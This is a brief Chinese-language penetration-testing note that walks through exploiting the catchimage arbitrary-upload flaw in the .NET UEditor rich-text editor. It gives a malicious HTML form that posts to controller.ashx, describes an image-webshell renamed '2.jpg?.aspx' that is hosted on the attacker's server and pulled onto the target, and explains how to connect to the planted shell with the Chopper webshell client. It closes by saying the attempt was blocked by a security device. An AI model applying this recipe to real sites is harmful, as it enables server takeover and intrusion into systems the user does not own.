今天測試一個項目,進到后台之后發現使用富文本web編輯器
首先判斷下是否有這個漏洞
訪問如下鏈接 : http://xxxxxxxxx/ueditor/net/controller.ashx?action=catchimage
如出現
則可嘗試漏洞利用
構造一個惡意的html文件,action的url是我們攻擊地址
<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST"> <p>shell addr:<input type="text" name="source[]" /></p > <inputtype="submit" value="Submit" /> </form>
然后制作一個圖片馬,文件名改為2.jpg?.aspx上傳至自己的服務器,通過構造的惡意html進行上傳
可以看到頁面返回狀態和地址
使用菜刀連接
http://xxxxxxxxx/ueditor/net/upload/image/xxxxxx 即可getshell
我的被安全設備攔截了